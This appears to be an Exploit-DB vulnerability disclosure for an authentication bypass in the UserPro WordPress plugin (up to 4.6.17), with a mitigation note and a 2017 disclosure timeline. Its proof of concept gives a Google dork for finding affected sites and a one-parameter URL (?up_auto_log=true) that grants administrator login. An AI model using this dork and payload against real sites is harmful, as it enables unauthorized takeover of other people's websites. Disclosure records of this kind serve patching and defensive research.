Userpro – WordPress Plugin – Authentication Bypass

vendor:

Userpro User Profiles with Social Login

by:

Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)

7,5

CVSS

HIGH

Authentication Bypass

N/A

CWE

Product Name: Userpro User Profiles with Social Login

Affected Version From: <= 4.6.17

Affected Version To: N/A

Patch Exists: Yes

Related CWE: Requested, not assigned yet.

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Wordpress 4.8.3

2017

Userpro – WordPress Plugin – Authentication Bypass

The userpro plugin has the ability to bypass login authentication for the user 'admin'. If the site does not use the standard username 'admin' it is not affected. PoC: 1 - Google Dork inurl:/plugins/userpro 2 - Browse to a site that has the userpro plugin installed. 3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true 4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in will full administrator access.

Mitigation:

Update the userpro plugin to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass
# Google Dork: inurl:/plugins/userpro
# Date: 11.04.2017
# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Version: <= 4.6.17
# Tested on: Wordpress 4.8.3
# CVE : requested, not assigned yet.

Description
================================================================================
 The userpro plugin has the ability to bypass login authentication for the user
 'admin'. If the site does not use the standard username 'admin' it is not affected.
   
PoC
================================================================================
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in
will full administrator access.
================================================================================

10/25/2017 – Wordfence notified of issue by Iain Hadgraft.
10/26/2017 – Vendor resolved the issue in the plugin.
11/04/2017 - Disclosure.